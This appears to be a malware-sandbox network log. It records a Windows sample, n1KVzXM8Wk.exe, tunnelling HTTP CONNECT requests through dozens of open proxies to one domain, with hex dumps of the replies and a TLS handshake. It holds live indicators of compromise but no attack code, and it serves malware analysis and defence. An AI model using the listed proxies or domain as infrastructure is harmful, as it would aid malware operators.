                                                                                                      Feb 23, 2024 09:45:21.858196020 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:22.047046900 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      724192.168.2.452169139.129.202.244806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.868381023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.238567114 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.20.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      725192.168.2.45219545.117.179.179281516812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.868824959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.680598021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.866122961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.975126982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.178400040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.366035938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.475239038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      726192.168.2.452390104.21.85.200806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.868885040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.956707954 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      727192.168.2.452391198.37.57.112806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.869036913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.967206955 CET503INHTTP/1.1 400 Bad Request
                                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 324
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      728192.168.2.452370162.223.94.164806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.869107008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.019803047 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      729192.168.2.451385140.238.247.981006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.869117022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      730192.168.2.452158221.224.44.9173026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.876413107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      731192.168.2.45155191.189.177.19031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.878587008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.377612114 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid/5.7
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3532
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      X-Cache: MISS from lb1
                                                                                                      X-Cache-Lookup: NONE from lb1:3128
                                                                                                      Via: 1.1 lb1 (squid/5.7)
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      732192.168.2.45233931.28.4.192806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.880999088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.087304115 CET488INHTTP/1.1 400 Bad Request
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Content-Length: 306
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 63 2e 70 6c 6f 6d 62 77 61 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 1c.plombway.ru Port 80</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      733192.168.2.452288186.124.164.213806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.896065950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      734192.168.2.452243220.248.70.23790026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.903270006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.188865900 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      735192.168.2.4523623.127.62.252806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.916065931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.106080055 CET148INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.4.7
                                                                                                      Server: Avaya CMBE/2
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:22.106448889 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 5b 21 14 96 19 a4 fb c7 56 d2 5a 99 a6 ca 29 94 4b 95 cd f3 b3 4e 0c 86 8a fb a9 cd f5 9d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[!VZ)KN*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#2gO+qveZ=6#5="
                                                                                                      Feb 23, 2024 09:45:22.287121058 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 e5 44 c6 ad 67 db f6 38 20 b1 09 78 1d 20 ae 96 43 7f 5c 39 b6 2e 0c 5d 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                                      Data Ascii: =9Dg8 x C\9.]DOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223084516Z260222084516Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                                      Feb 23, 2024 09:45:22.287126064 CET536INData Raw: 01 00 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 40 a7 79 08 c0 57 5e f2 c9 fe 93 27 48 bf 87 0e 55 32 8e 93 12 4b 22 77 91 63 45 35 db b0 46 0d 30 b5 55 5b a6 6e 98 b7 81 4e 20 68 b2 ac 2a d7 ea 6e d5 91 8b e4 6f 00 ad 25 d4
                                                                                                      Data Ascii: 0*H@yW^'HU2K"wcE5F0U[nN h*no%x1FjS-:K8g'F9^PL={B|4J`{!;D;47:}+9UJ6~E&+$S$Z@bh:t"V$t;rV
                                                                                                      Feb 23, 2024 09:45:22.287131071 CET57INData Raw: 9d 9c df 4b 6f 3e af 57 fa f5 62 ec fc bf e7 b5 37 45 2e a1 8c bc 7f 41 de 8b c1 b8 d3 97 e7 f5 71 07 2e a9 73 ff 73 0e e7 90 55 b2 22 e4 45 64 16 03 03 00 04 0e 00 00 00
                                                                                                      Data Ascii: Ko>Wb7E.Aq.ssU"Ed
                                                                                                      Feb 23, 2024 09:45:22.296519995 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 76 a9 af 00 2f f8 a8 23 4a ae 10 b0 b0 1b fa de b5 fe bc fa 88 2e 18 2e 24 8a f2 23 9b 5a 3e 32 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ba 6e 7a 02 44 e1 1b 3c 81 3a 31 b9 a3 d0 40 f2 cb 5f ed 4c d5
                                                                                                      Data Ascii: %! v/#J..$#Z>2(nzD<:1@_Lx^B4
                                                                                                      Feb 23, 2024 09:45:22.470500946 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 b5 55 25 90 f4 fc 3f 29 aa 12 58 b2 e6 59 c3 1b 15 4b 73 cf 6c bc 36 c5 55 48 c0 eb 12 3a 7f 20 7c 03 7e bd ae 84 b4 b1
                                                                                                      Data Ascii: (U%?)XYKsl6UH: |~


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      736192.168.2.45229113.232.245.132806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.947721958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.225940943 CET531INHTTP/1.1 405 Method Not Allowed
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Allow: POST,OPTIONS,HEAD,GET
                                                                                                      Content-Length: 331
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      737192.168.2.451320117.160.250.13188996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.948482990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.515378952 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
